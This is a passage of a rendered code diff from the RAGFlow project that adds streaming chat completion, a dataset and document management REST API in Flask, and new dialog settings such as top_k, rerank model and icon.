vector_similarity_weight, top, doc_ids)
|
||||
|
||||
rerank_mdl = None
|
||||
if req.get("rerank_id"):
|
||||
rerank_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
|
||||
|
||||
if req.get("keyword", False):
|
||||
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
|
||||
question += keyword_extraction(chat_mdl, question)
|
||||
|
||||
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
|
||||
similarity_threshold, vector_similarity_weight, top,
|
||||
doc_ids, rerank_mdl=rerank_mdl)
|
||||
for c in ranks["chunks"]:
|
||||
if "vector" in c:
|
||||
del c["vector"]
|
||||
|
||||
@ -13,12 +13,14 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request
|
||||
from copy import deepcopy
|
||||
from flask import request, Response
|
||||
from flask_login import login_required
|
||||
from api.db.services.dialog_service import DialogService, ConversationService, chat
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result
|
||||
import json
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@ -103,9 +105,12 @@ def list_convsersation():
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("conversation_id", "messages")
|
||||
#@validate_request("conversation_id", "messages")
|
||||
def completion():
|
||||
req = request.json
|
||||
#req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
|
||||
# {"role": "user", "content": "上海有吗?"}
|
||||
#]}
|
||||
msg = []
|
||||
for m in req["messages"]:
|
||||
if m["role"] == "system":
|
||||
@ -117,19 +122,54 @@ def completion():
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
conv.message.append(msg[-1])
|
||||
conv.message.append(deepcopy(msg[-1]))
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
del req["messages"]
|
||||
ans = chat(dia, msg, **req)
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": ""})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
conv.message.append({"role": "assistant", "content": ans["answer"]})
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, True, **req):
|
||||
fillin_conv(ans)
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
return get_json_result(data=ans)
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
if req.get("stream", True):
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
else:
|
||||
answer = None
|
||||
for ans in chat(dia, msg, **req):
|
||||
answer = ans
|
||||
fillin_conv(ans)
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
break
|
||||
return get_json_result(data=answer)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
615
api/apps/dataset_api.py
Normal file
615
api/apps/dataset_api.py
Normal file
@ -0,0 +1,615 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
import warnings
|
||||
from io import BytesIO
|
||||
|
||||
from flask import request, send_file
|
||||
from flask_login import login_required, current_user
|
||||
from httpx import HTTPError
|
||||
from minio import S3Error
|
||||
|
||||
from api.contants import NAME_LENGTH_LIMIT
|
||||
from api.db import FileType, ParserType, FileSource
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import construct_json_result, construct_error_response
|
||||
from api.utils.api_utils import construct_result, validate_request
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
# ------------------------------ create a dataset ---------------------------------------
|
||||
|
||||
@manager.route("/", methods=["POST"])
|
||||
@login_required # use login
|
||||
@validate_request("name") # check name key
|
||||
def create_dataset():
|
||||
# Check if Authorization header is present
|
||||
authorization_token = request.headers.get("Authorization")
|
||||
if not authorization_token:
|
||||
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
|
||||
|
||||
# TODO: Login or API key
|
||||
# objs = APIToken.query(token=authorization_token)
|
||||
#
|
||||
# # Authorization error
|
||||
# if not objs:
|
||||
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
|
||||
#
|
||||
# tenant_id = objs[0].tenant_id
|
||||
|
||||
tenant_id = current_user.id
|
||||
request_body = request.json
|
||||
|
||||
# In case that there's no name
|
||||
if "name" not in request_body:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
|
||||
|
||||
dataset_name = request_body["name"]
|
||||
|
||||
# empty dataset_name
|
||||
if not dataset_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
|
||||
|
||||
# In case that there's space in the head or the tail
|
||||
dataset_name = dataset_name.strip()
|
||||
|
||||
# In case that the length of the name exceeds the limit
|
||||
dataset_name_length = len(dataset_name)
|
||||
if dataset_name_length > NAME_LENGTH_LIMIT:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
|
||||
|
||||
# In case that there are other fields in the data-binary
|
||||
if len(request_body.keys()) > 1:
|
||||
name_list = []
|
||||
for key_name in request_body.keys():
|
||||
if key_name != "name":
|
||||
name_list.append(key_name)
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"fields: {name_list}, are not allowed in request body.")
|
||||
|
||||
# If there is a duplicate name, it will modify it to make it unique
|
||||
request_body["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=dataset_name,
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
request_body["id"] = get_uuid()
|
||||
request_body["tenant_id"] = tenant_id
|
||||
request_body["created_by"] = tenant_id
|
||||
exist, t = TenantService.get_by_id(tenant_id)
|
||||
if not exist:
|
||||
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
|
||||
request_body["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**request_body):
|
||||
# failed to create new dataset
|
||||
return construct_result()
|
||||
return construct_json_result(code=RetCode.SUCCESS,
|
||||
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# -----------------------------list datasets-------------------------------------------------------
|
||||
|
||||
@manager.route("/", methods=["GET"])
|
||||
@login_required
|
||||
def list_datasets():
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
|
||||
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
except HTTPError as http_err:
|
||||
return construct_json_result(http_err)
|
||||
|
||||
# ---------------------------------delete a dataset ----------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def remove_dataset(dataset_id):
|
||||
try:
|
||||
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
|
||||
|
||||
# according to the id, searching for the dataset
|
||||
if not datasets:
|
||||
return construct_json_result(message=f"The dataset cannot be found for your current account.",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Iterating the documents inside the dataset
|
||||
for doc in DocumentService.query(kb_id=dataset_id):
|
||||
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
|
||||
# the process of deleting failed
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the document removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# delete the other files
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
# delete the dataset
|
||||
if not KnowledgebaseService.delete_by_id(dataset_id):
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There was an error during the dataset removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# success
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ------------------------------ get details of a dataset ----------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["GET"])
|
||||
@login_required
|
||||
def get_dataset(dataset_id):
|
||||
try:
|
||||
dataset = KnowledgebaseService.get_detail(dataset_id)
|
||||
if not dataset:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
|
||||
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_json_result(e)
|
||||
|
||||
# ------------------------------ update a dataset --------------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_dataset(dataset_id):
|
||||
req = request.json
|
||||
try:
|
||||
# the request cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
|
||||
"you want to update!")
|
||||
# check whether the dataset can be found
|
||||
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
|
||||
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
# check whether there is this dataset
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
|
||||
|
||||
if "name" in req:
|
||||
name = req["name"].strip()
|
||||
# check whether there is duplicate name
|
||||
if name.lower() != dataset.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)) > 1:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"The name: {name.lower()} is already used by other "
|
||||
f"datasets. Please choose a different name.")
|
||||
|
||||
dataset_updating_data = {}
|
||||
chunk_num = req.get("chunk_num")
|
||||
# modify the value of 11 parameters
|
||||
|
||||
# 2 parameters: embedding id and chunk method
|
||||
# only if chunk_num is 0, the user can update the embedding id
|
||||
if req.get("embedding_model_id"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data["embd_id"] = req["embedding_model_id"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document in this "
|
||||
"dataset, so you cannot change the embedding "
|
||||
"model.")
|
||||
# only if chunk_num is 0, the user can update the chunk_method
|
||||
if req.get("chunk_method"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data['parser_id'] = req["chunk_method"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
|
||||
"in this dataset, so you cannot "
|
||||
"change the chunk method.")
|
||||
# convert the photo parameter to avatar
|
||||
if req.get("photo"):
|
||||
dataset_updating_data["avatar"] = req["photo"]
|
||||
|
||||
# layout_recognize
|
||||
if "layout_recognize" in req:
|
||||
if "parser_config" not in dataset_updating_data:
|
||||
dataset_updating_data['parser_config'] = {}
|
||||
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
|
||||
|
||||
# TODO: updating use_raptor needs to construct a class
|
||||
|
||||
# 6 parameters
|
||||
for key in ["name", "language", "description", "permission", "id", "token_num"]:
|
||||
if key in req:
|
||||
dataset_updating_data[key] = req.get(key)
|
||||
|
||||
# update
|
||||
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
|
||||
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
|
||||
"Please check the status of RAGFlow "
|
||||
"server and try again!")
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
|
||||
"using the dataset ID.")
|
||||
|
||||
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# --------------------------------content management ----------------------------------------------
|
||||
|
||||
# ----------------------------upload files-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/", methods=["POST"])
|
||||
@login_required
|
||||
def upload_documents(dataset_id):
|
||||
# no files
|
||||
if not request.files:
|
||||
return construct_json_result(
|
||||
message="There is no file!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# the number of uploading files exceeds the limit
|
||||
file_objs = request.files.getlist("file")
|
||||
num_file_objs = len(file_objs)
|
||||
|
||||
if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"You try to upload {num_file_objs} files, "
|
||||
f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")
|
||||
|
||||
# no dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)
|
||||
|
||||
for file_obj in file_objs:
|
||||
file_name = file_obj.filename
|
||||
# no name
|
||||
if not file_name:
|
||||
return construct_json_result(
|
||||
message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# TODO: support the remote files
|
||||
if 'http' in file_name:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files have not unsupported.")
|
||||
|
||||
# get the root_folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# get the id of the root_folder
|
||||
parent_file_id = root_folder["id"] # document id
|
||||
# this is for the new user, create '.knowledgebase' file
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# go inside this folder, get the kb_root_folder
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
# link the file management to the kb_folder
|
||||
kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])
|
||||
|
||||
# grab all the errs
|
||||
err = []
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
|
||||
uploaded_docs_json = []
|
||||
for file in file_objs:
|
||||
try:
|
||||
# TODO: get this value from the database as some tenants have this limit while others don't
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="Exceed the maximum file number of a free user!")
|
||||
# deal with the duplicate name
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=dataset.id)
|
||||
|
||||
# deal with the unsupported type
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="This type of file has not been supported yet!")
|
||||
|
||||
# upload to the minio
|
||||
location = filename
|
||||
while MINIO.obj_exist(dataset_id, location):
|
||||
location += "_"
|
||||
|
||||
blob = file.read()
|
||||
# the content is empty, raising a warning
|
||||
if blob == b'':
|
||||
warnings.warn(f"[WARNING]: The file {filename} is empty.")
|
||||
|
||||
MINIO.put(dataset_id, location, blob)
|
||||
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": dataset.id,
|
||||
"parser_id": dataset.parser_id,
|
||||
"parser_config": dataset.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
|
||||
uploaded_docs_json.append(doc)
|
||||
except Exception as e:
|
||||
err.append(file.filename + ": " + str(e))
|
||||
|
||||
if err:
|
||||
# return all the errors
|
||||
return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
|
||||
# success
|
||||
return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------delete a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def delete_document(document_id, dataset_id): # string
|
||||
# get the root folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# parent file's id
|
||||
parent_file_id = root_folder["id"]
|
||||
# consider the new user
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# store all the errors that may have
|
||||
errors = ""
|
||||
try:
|
||||
# whether there is this document
|
||||
exist, doc = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
|
||||
# whether this doc is authorized by this tenant
|
||||
tenant_id = DocumentService.get_tenant_id(document_id)
|
||||
if not tenant_id:
|
||||
return construct_json_result(
|
||||
message=f"You cannot delete this document {document_id} due to the authorization"
|
||||
f" reason!", code=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
# get the doc's id and location
|
||||
real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)
|
||||
|
||||
if real_dataset_id != dataset_id:
|
||||
return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
|
||||
f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# there is an issue when removing
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return construct_json_result(
|
||||
message="There was an error during the document removal process. Please check the status of the "
|
||||
"RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# fetch the File2Document record associated with the provided document ID.
|
||||
file_to_doc = File2DocumentService.get_by_document_id(document_id)
|
||||
# delete the associated File record.
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
|
||||
# delete the File2Document record itself using the document ID. This removes the
|
||||
# association between the document and the file after the File record has been deleted.
|
||||
File2DocumentService.delete_by_document_id(document_id)
|
||||
|
||||
# delete it from minio
|
||||
MINIO.rm(dataset_id, location)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
if errors:
|
||||
return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)
|
||||
|
||||
return construct_json_result(data=True, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------list files-----------------------------------------------------
|
||||
@manager.route('/<dataset_id>/documents/', methods=['GET'])
|
||||
@login_required
|
||||
def list_documents(dataset_id):
|
||||
if not dataset_id:
|
||||
return construct_json_result(
|
||||
data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# searching keywords
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
order_by = request.args.get("order_by", "create_time")
|
||||
descend = request.args.get("descend", True)
|
||||
try:
|
||||
docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
|
||||
descend, keywords)
|
||||
|
||||
return construct_json_result(data={"total": total, "docs": docs}, message=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------update: enable rename-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_document(dataset_id, document_id):
|
||||
req = request.json
|
||||
try:
|
||||
legal_parameters = set()
|
||||
legal_parameters.add("name")
|
||||
legal_parameters.add("enable")
|
||||
legal_parameters.add("template_type")
|
||||
|
||||
for key in req.keys():
|
||||
if key not in legal_parameters:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")
|
||||
|
||||
# The request body cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message="Please input at least one parameter that you want to update!")
|
||||
|
||||
# Check whether there is this dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")
|
||||
|
||||
# The document does not exist
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document {document_id} cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# Deal with the different keys
|
||||
updating_data = {}
|
||||
if "name" in req:
|
||||
new_name = req["name"]
|
||||
updating_data["name"] = new_name
|
||||
# Check whether the new_name is suitable
|
||||
# 1. no name value
|
||||
if not new_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")
|
||||
|
||||
# 2. In case that there's space in the head or the tail
|
||||
new_name = new_name.strip()
|
||||
|
||||
# 3. Check whether the new_name has the same extension of file as before
|
||||
if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
|
||||
document.name.lower()).suffix:
|
||||
return construct_json_result(
|
||||
data=False,
|
||||
message="The extension of file cannot be changed",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# 4. Check whether the new name has already been occupied by other file
|
||||
for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
|
||||
if d.name == new_name:
|
||||
return construct_json_result(
|
||||
message="Duplicated document name in the same dataset.",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
if "enable" in req:
|
||||
enable_value = req["enable"]
|
||||
if is_illegal_value_for_enum(enable_value, StatusEnum):
|
||||
return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["status"] = enable_value
|
||||
|
||||
# TODO: Chunk-method - update parameters inside the json object parser_config
|
||||
if "template_type" in req:
|
||||
type_value = req["template_type"]
|
||||
if is_illegal_value_for_enum(type_value, ParserType):
|
||||
return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["parser_id"] = req["template_type"]
|
||||
|
||||
# The process of updating
|
||||
if not DocumentService.update_by_id(document_id, updating_data):
|
||||
return construct_json_result(
|
||||
code=RetCode.OPERATING_ERROR,
|
||||
message="Failed to update document in the database! "
|
||||
"Please check the status of RAGFlow server and try again!")
|
||||
|
||||
# name part: file service
|
||||
if "name" in req:
|
||||
# Get file by document id
|
||||
file_information = File2DocumentService.get_by_document_id(document_id)
|
||||
if file_information:
|
||||
exist, file = FileService.get_by_id(file_information[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
|
||||
# Success
|
||||
return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# Helper method to judge whether it's an illegal value
|
||||
def is_illegal_value_for_enum(value, enum_class):
|
||||
return value not in enum_class.__members__.values()
|
||||
|
||||
# ----------------------------download a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
|
||||
@login_required
|
||||
def download_document(dataset_id, document_id):
|
||||
try:
|
||||
# Check whether there is this dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# The process of downloading
|
||||
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
|
||||
file_stream = MINIO.get(doc_id, doc_location)
|
||||
if not file_stream:
|
||||
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
|
||||
|
||||
file = BytesIO(file_stream)
|
||||
|
||||
# Use send_file with a proper filename and MIME type
|
||||
return send_file(
|
||||
file,
|
||||
as_attachment=True,
|
||||
download_name=document.name,
|
||||
mimetype='application/octet-stream' # Set a default MIME type
|
||||
)
|
||||
|
||||
# Error
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------start parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------stop parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------show the status of the file-----------------------------------------------------
|
||||
|
||||
# ----------------------------list the chunks of the file-----------------------------------------------------
|
||||
|
||||
# -- --------------------------delete the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------edit the status of the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------insert a new chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------upload a file-----------------------------------------------------
|
||||
|
||||
# ----------------------------get a specific chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------retrieval test-----------------------------------------------------
|
||||
|
||||
|
||||
|
||||
@ -32,16 +32,15 @@ def set_dialog():
|
||||
dialog_id = req.get("dialog_id")
|
||||
name = req.get("name", "New Dialog")
|
||||
description = req.get("description", "A helpful Dialog")
|
||||
icon = req.get("icon", "")
|
||||
top_n = req.get("top_n", 6)
|
||||
top_k = req.get("top_k", 1024)
|
||||
rerank_id = req.get("rerank_id", "")
|
||||
if not rerank_id: req["rerank_id"] = ""
|
||||
similarity_threshold = req.get("similarity_threshold", 0.1)
|
||||
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
|
||||
llm_setting = req.get("llm_setting", {
|
||||
"temperature": 0.1,
|
||||
"top_p": 0.3,
|
||||
"frequency_penalty": 0.7,
|
||||
"presence_penalty": 0.4,
|
||||
"max_tokens": 215
|
||||
})
|
||||
if vector_similarity_weight is None: vector_similarity_weight = 0.3
|
||||
llm_setting = req.get("llm_setting", {})
|
||||
default_prompt = {
|
||||
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
|
||||
以下是知识库:
|
||||
@ -89,8 +88,11 @@ def set_dialog():
|
||||
"llm_setting": llm_setting,
|
||||
"prompt_config": prompt_config,
|
||||
"top_n": top_n,
|
||||
"top_k": top_k,
|
||||
"rerank_id": rerank_id,
|
||||
"similarity_threshold": similarity_threshold,
|
||||
"vector_similarity_weight": vector_similarity_weight
|
||||
"vector_similarity_weight": vector_similarity_weight,
|
||||
"icon": icon
|
||||
}
|
||||
if not DialogService.save(**dia):
|
||||
